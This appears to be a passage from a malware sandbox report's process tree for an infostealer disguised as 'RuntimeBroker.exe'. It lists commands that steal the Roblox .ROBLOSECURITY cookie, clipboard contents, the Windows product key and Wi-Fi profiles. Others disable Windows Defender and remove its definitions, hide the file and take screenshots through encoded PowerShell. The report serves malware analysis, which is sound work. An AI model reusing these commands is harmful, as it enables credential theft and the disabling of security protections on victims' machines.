AAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        35⤵
        
        PID:4392
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fmoymp31\fmoymp31.cmdline"
        36⤵
        
        PID:5268
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCD4E.tmp" "c:\Users\Admin\AppData\Local\Temp\fmoymp31\CSC9BBFCA51AB943279359B447D6D6BD4D.TMP"
        37⤵
        
        PID:400
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        34⤵
        
        PID:6060
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        35⤵
        
        PID:1388
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        35⤵
        
        PID:3076
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        34⤵
        
        PID:5960
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        35⤵
        
        PID:5332
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        34⤵
        
        PID:5460
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        35⤵
        
        PID:6064
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        34⤵
        
        PID:5628
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        35⤵
        
        PID:1952
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        34⤵
        
        PID:6004
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        35⤵
        
        PID:5324
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        34⤵
        
        PID:5716
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6068
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        34⤵
        
        PID:5396
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        35⤵
        
        PID:1212
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        34⤵
        
        PID:5968
        
        C:\Windows\system32\getmac.exe
        
        getmac
        35⤵
        
        PID:6128
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"skoch" "C:\Users\Admin\AppData\Local\Temp\aJXce.zip" *"
        34⤵
        
        PID:5976
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        35⤵
        
        PID:5596
        
        C:\Users\Admin\AppData\Local\Temp\_MEI58162\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"skoch" "C:\Users\Admin\AppData\Local\Temp\aJXce.zip" *
        35⤵
        
        PID:5792
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        34⤵
        
        PID:1520
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        35⤵
        
        PID:4568
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        35⤵
        
        PID:4528
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        34⤵
        
        PID:6120
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        35⤵
        
        PID:3476
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        35⤵
        
        PID:5440
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        34⤵
        
        PID:5320
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        35⤵
        
        PID:2592
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        35⤵
        
        PID:4180
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        34⤵
        
        PID:1184
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5592
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        34⤵
        
        PID:4932
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        35⤵
        Detects videocard installed
        
        PID:2824
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        34⤵
        
        PID:5436
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        35⤵
        
        PID:3720
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe""
        34⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1692
        
        C:\Windows\system32\PING.EXE
        
        ping localhost -n 3
        35⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2524
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        31⤵
        
        PID:5568
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        32⤵
        
        PID:896
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        30⤵
        
        PID:5448
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        31⤵
        
        PID:5928
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        29⤵
        
        PID:2872
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        30⤵
        
        PID:3028
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        28⤵
        
        PID:5892
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        29⤵
        
        PID:4136
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        27⤵
        
        PID:3624
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        28⤵
        
        PID:5520
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        26⤵
        
        PID:1176
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        27⤵
        
        PID:3480
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        25⤵
        
        PID:2140
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        26⤵
        
        PID:3160
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        24⤵
        
        PID:2456
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        25⤵
        
        PID:5732
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe'"
        26⤵
        
        PID:5804
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe'
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3752
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        26⤵
        
        PID:5868
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5928
        
        C:\Program Files\Windows Defender\MpCmdRun.exe
        
        "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
        27⤵
        Deletes Windows Defender Definitions
        
        PID:3716
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe""
        26⤵
        Hide Artifacts: Hidden Files and Directories
        
        PID:1156
        
        C:\Windows\system32\attrib.exe
        
        attrib +h +s "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        27⤵
        Views/modifies file attributes
        
        PID:4744
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
        26⤵
        
        PID:4420
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        27⤵
        
        PID:3108
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6080
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        26⤵
        
        PID:5620
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        27⤵
        Enumerates processes with tasklist
        
        PID:5852
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        26⤵
        
        PID:5876
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        27⤵
        Enumerates processes with tasklist
        
        PID:6100
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        26⤵
        
        PID:2532
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        27⤵
        
        PID:2336
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        26⤵
        Clipboard Data
        
        PID:1256
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        27⤵
        
        PID:3904
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        27⤵
        Clipboard Data
        
        PID:2592
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        26⤵
        
        PID:3444
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        27⤵
        
        PID:3740
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        27⤵
        Enumerates processes with tasklist
        
        PID:5288
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        26⤵
        
        PID:4548
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        27⤵
        
        PID:5164
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        26⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:3276
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        27⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:4404
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        26⤵
        
        PID:2352
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        27⤵
        Gathers system information
        
        PID:4600
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        26⤵
        
        PID:5756
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlA